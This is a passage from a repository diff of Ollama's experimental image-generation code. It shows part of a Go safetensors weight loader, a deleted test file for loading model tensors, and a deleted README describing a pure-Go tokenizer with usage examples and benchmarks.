names = append(names, name)
}
sort.Strings(names)
return names
}
// HasTensor checks if a tensor exists.
func (mw *ModelWeights) HasTensor(name string) bool {
_, ok := mw.tensorFiles[name]
return ok
}
// ReleaseAll releases all cached native file handles.
func (mw *ModelWeights) ReleaseAll() {
for path, native := range mw.nativeCache {
native.Free()
delete(mw.nativeCache, path)
}
}

View File

@@ -1,167 +0,0 @@
//go:build mlx
package safetensors
import (
"os"
"path/filepath"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
)
func TestLoadModelWeights(t *testing.T) {
// Skip if no model available
modelDir := "../weights/gpt-oss-20b"
if _, err := os.Stat(modelDir); os.IsNotExist(err) {
t.Skip("model weights not available")
}
mw, err := LoadModelWeights(modelDir)
if err != nil {
t.Fatalf("LoadModelWeights: %v", err)
}
defer mw.ReleaseAll()
// Check we found tensors
tensors := mw.ListTensors()
if len(tensors) == 0 {
t.Fatal("no tensors found")
}
t.Logf("found %d tensors", len(tensors))
// Check HasTensor
if !mw.HasTensor(tensors[0]) {
t.Errorf("HasTensor(%q) = false", tensors[0])
}
if mw.HasTensor("nonexistent.weight") {
t.Error("HasTensor returned true for nonexistent tensor")
}
}
func TestGetTensor(t *testing.T) {
modelDir := "../weights/gpt-oss-20b"
if _, err := os.Stat(modelDir); os.IsNotExist(err) {
t.Skip("model weights not available")
}
mw, err := LoadModelWeights(modelDir)
if err != nil {
t.Fatalf("LoadModelWeights: %v", err)
}
defer mw.ReleaseAll()
tensors := mw.ListTensors()
if len(tensors) == 0 {
t.Skip("no tensors")
}
// Load first tensor
arr, err := mw.GetTensor(tensors[0])
if err != nil {
t.Fatalf("GetTensor(%q): %v", tensors[0], err)
}
// Verify it has a shape
shape := arr.Shape()
if len(shape) == 0 {
t.Error("tensor has no shape")
}
t.Logf("%s: shape=%v dtype=%v", tensors[0], shape, arr.Dtype())
}
func TestLoadWithDtype(t *testing.T) {
modelDir := "../weights/gpt-oss-20b"
if _, err := os.Stat(modelDir); os.IsNotExist(err) {
t.Skip("model weights not available")
}
mw, err := LoadModelWeights(modelDir)
if err != nil {
t.Fatalf("LoadModelWeights: %v", err)
}
defer mw.ReleaseAll()
// Load all tensors as bfloat16
if err := mw.Load(mlx.DtypeBFloat16); err != nil {
t.Fatalf("Load: %v", err)
}
// Get a tensor from cache
tensors := mw.ListTensors()
arr, err := mw.Get(tensors[0])
if err != nil {
t.Fatalf("Get: %v", err)
}
// Verify dtype (unless it was already bf16)
t.Logf("%s: dtype=%v", tensors[0], arr.Dtype())
}
func TestLookupTensor(t *testing.T) {
modelDir := "../weights/gpt-oss-20b"
if _, err := os.Stat(modelDir); os.IsNotExist(err) {
t.Skip("model weights not available")
}
mw, err := LoadModelWeights(modelDir)
if err != nil {
t.Fatalf("LoadModelWeights: %v", err)
}
defer mw.ReleaseAll()
// HasTensor returns false for nonexistent
if mw.HasTensor("nonexistent") {
t.Error("HasTensor should return false for nonexistent")
}
// HasTensor returns true for existing tensor
tensors := mw.ListTensors()
if !mw.HasTensor(tensors[0]) {
t.Error("HasTensor should return true for existing tensor")
}
}
func TestParseSafetensorHeader(t *testing.T) {
modelDir := "../weights/gpt-oss-20b"
if _, err := os.Stat(modelDir); os.IsNotExist(err) {
t.Skip("model weights not available")
}
// Find a safetensors file
entries, err := os.ReadDir(modelDir)
if err != nil {
t.Fatal(err)
}
var stFile string
for _, e := range entries {
if filepath.Ext(e.Name()) == ".safetensors" {
stFile = filepath.Join(modelDir, e.Name())
break
}
}
if stFile == "" {
t.Skip("no safetensors file found")
}
header, err := parseSafetensorHeader(stFile)
if err != nil {
t.Fatalf("parseSafetensorHeader: %v", err)
}
if len(header) == 0 {
t.Error("header is empty")
}
// Check a tensor has valid info
for name, info := range header {
if info.Dtype == "" {
t.Errorf("%s: empty dtype", name)
}
if len(info.Shape) == 0 {
t.Errorf("%s: empty shape", name)
}
break // just check one
}
}

View File

@@ -1,85 +0,0 @@
# Tokenizer
Tokenizer for LLM inference supporting BPE, SentencePiece, and WordPiece algorithms. The goal of this package is to see if a pure Go tokenizer can be fast and correct. It primarily supports the `imagegen` models however it (or parts of it) could be considered to replace Ollama's tokenizer in the `model` package.
## Features
- **BPE (Byte Pair Encoding)** - GPT-2/Llama style with byte-level encoding
- **SentencePiece** - Gemma style with `▁` space handling
- **WordPiece** - BERT style with `##` continuation tokens
- **Parallel encoding** - Automatic parallelization for inputs >4KB
- **HuggingFace compatible** - Loads `tokenizer.json` directly
## Usage
```go
import "github.com/ollama/ollama/x/imagegen/tokenizer"
// Load from HuggingFace model directory
tok, err := tokenizer.Load("./weights/Llama-3.2-1B")
if err != nil {
log.Fatal(err)
}
// Encode text to token IDs
ids := tok.Encode("Hello, world!", false) // false = don't add BOS
// Decode back to text
text := tok.Decode(ids)
// Check special tokens
if tok.IsEOS(ids[len(ids)-1]) {
// End of sequence
}
```
## Performance
Benchmarks on Apple M3 Max:
| Input Size | Encode | Decode | Tokens |
|------------|--------|--------|--------|
| 1 KB | 14.5 MB/s | 267 MB/s | 231 |
| 10 KB | 10.9 MB/s | 321 MB/s | 2,301 |
| 100 KB | 8.9 MB/s | 311 MB/s | 23,001 |
| 1 MB | 9.6 MB/s | 321 MB/s | 230,001 |
Comparison with other implementations (10 MB input):
| Implementation | Encode Speed | Notes |
|----------------|--------------|-------|
| Engine (this) | ~10 MB/s | stdlib RE2, parallel >4KB |
| tiktoken (Rust) | ~17 MB/s | Highly optimized regex |
| Ollama (Go) | ~2-3 MB/s | regexp2 backtracking |
## Performance Opportunities
Potential optimizations not yet implemented:
| Optimization | Expected Gain | Complexity |
|--------------|---------------|------------|
| Aho-Corasick for special tokens | 2-3x for many special tokens | Medium |
| Custom regex engine (like tiktoken) | 1.5-2x | High |
| SIMD byte scanning | 1.3-1.5x for pretokenizer | Medium |
| Assembly BPE merge loop | 1.2-1.5x | High |
| Memoization for repeated substrings | Variable | Low |
Current bottleneck is the pretokenizer regex (~60% of encode time). tiktoken achieves ~17 MB/s with a hand-tuned Rust regex engine.
## Not Yet Implemented
| Feature | Used By | Notes |
|---------|---------|-------|
| Unigram tokenizer | T5, ALBERT, mBART | Different algorithm (not BPE) |
| Unicode normalizers | Some multilingual models | NFD, NFKC, lowercase, etc. |
| Custom pretokenizers | Model-specific | Beyond standard patterns |
Most HuggingFace models use BPE or SentencePiece, which are fully supported. WordPiece (BERT-style) is also supported with standard `[UNK]` fallback for out-of-vocabulary characters.
## Files
| File | Description |
|------|-------------|
| `tokenizer.go` | Main implementation (~1000 lines) |
| `tokenizer_test.go` | Tests and benchmarks |
| `testdata/` | Mini tokenizer for unit tests |

Some files were not shown because too many files have changed in this diff Show More